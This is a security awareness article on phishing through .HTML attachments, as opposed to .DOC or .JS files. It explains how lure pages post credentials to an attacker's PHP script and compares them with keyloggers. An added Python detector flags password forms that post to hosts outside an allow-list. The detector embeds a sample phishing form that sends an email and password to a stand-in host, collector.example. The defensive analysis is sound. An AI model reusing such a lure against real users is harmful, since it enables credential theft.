In the last six to nine months, .DOC and .JS file attachments have dominated the news surrounding the rise in phishing attacks. The reasons are clear and understandable: those two file types (typically packaged in .ZIP files) are commonly used to deliver extremely dangerous ransomware and banking Trojans. There is another file type, however, that employees in your organization should be wary of, because it is increasingly being distributed as a malicious attachment: .HTML files.
The page asks the user to enter their username and password to view the document file. To make the lure convincing and entice the user to sign in with an email account, the attacker added logos of popular email providers such as Gmail, Outlook and Yahoo Mail.
When a victim enters their username and password and submits the form, the credentials are posted to a PHP script configured by the attacker. Typically, this script is set up to forward the credentials to an email account controlled by the attacker.
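The mechanism just described (a form in the attachment whose `action` points at a remote collector script) is exactly what a mail gateway or analyst can check for. The following is an added example, not code from the original article: it parses an HTML attachment with Python's standard-library `html.parser`, finds every form that contains a password field, and flags forms that post to a host outside an allow-list. The sample attachment, the host `collector.example` and the `trusted_hosts` parameter are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of the kind of HTML attachment described above: a
# "document viewer" lure whose form posts credentials to a remote PHP script.
SAMPLE_ATTACHMENT = """<html><body>
<h2>Secure document</h2>
<p>Sign in with your email account to view the file.</p>
<img src="gmail.png"><img src="outlook.png"><img src="yahoo.png">
<form method="post" action="http://collector.example/post.php">
  <input type="text" name="email">
  <input type="password" name="passwd">
  <input type="submit" value="View document">
</form>
</body></html>"""


class CredentialFormParser(HTMLParser):
    """Records every <form> and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "has_password": bool}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "",
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_credential_forms(html_text):
    """Return the action URLs of all forms that ask for a password."""
    parser = CredentialFormParser()
    parser.feed(html_text)
    return [f["action"] for f in parser.forms if f["has_password"]]


def is_suspicious_action(action, trusted_hosts=()):
    """A password form inside a mailed attachment that posts to a host not on
    the allow-list is suspicious. Relative actions are ignored: opened from
    disk they resolve to file:// and cannot exfiltrate anything on their own."""
    parsed = urlparse(action)
    if not parsed.hostname:
        return False
    allowed = {h.lower() for h in trusted_hosts}
    return parsed.hostname.lower() not in allowed


def scan_attachment(html_text, trusted_hosts=()):
    """Return the suspicious credential-form actions found in an attachment."""
    return [a for a in find_credential_forms(html_text)
            if is_suspicious_action(a, trusted_hosts)]


if __name__ == "__main__":
    for action in scan_attachment(SAMPLE_ATTACHMENT):
        print("credential form posts to:", action)
```

The `trusted_hosts` allow-list exists because legitimate secure-mail products (such as the Cisco Registered Envelope Service mentioned later on this page) also ship HTML attachments with forms; the check is not "has a password field" but "sends that password somewhere the organization has not approved".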
Keyloggers are still commonly used by BEC actors to steal their victims' account credentials, and they are very effective. However, distributing an executable file via email is difficult nowadays, as anti-spam rules will flag such messages quickly. An HTML file, on the other hand, raises no immediate alarm – unless that particular file has already been identified as a phishing page.
A phishing page can be coded and deployed easily, unlike a keylogger, which requires some programming knowledge. A phishing page also runs on any platform, since it only needs a browser, whereas a keylogger depends on the platform it was built for.
One disadvantage of phishing pages compared with keyloggers is how they recover passwords from their victims. A phishing page requires the user to type their credentials into a form and submit it. A keylogger only needs to be executed once and then runs in the background.
Although your users and employees may not recognize the potential threat of .HTML attachments, this does not mean that they are not familiar with them. HTML attachments are commonly used by banks and other financial institutions to secure documents and messages, as well as for users to conduct banking business in a secure environment.
Many of your users may have seen emails like the one below from the Cisco Registered Envelope Service. Notice the HTML attachment.
If your organization is in the financial services industry, or if your employees regularly interact with financial institutions as part of their jobs, then it is likely that your employees regard .HTML attachments as routine and non-threatening. And therein lies the danger.
Let's take a look at the three most common ways that users and employees are socially engineered into surrendering their credentials.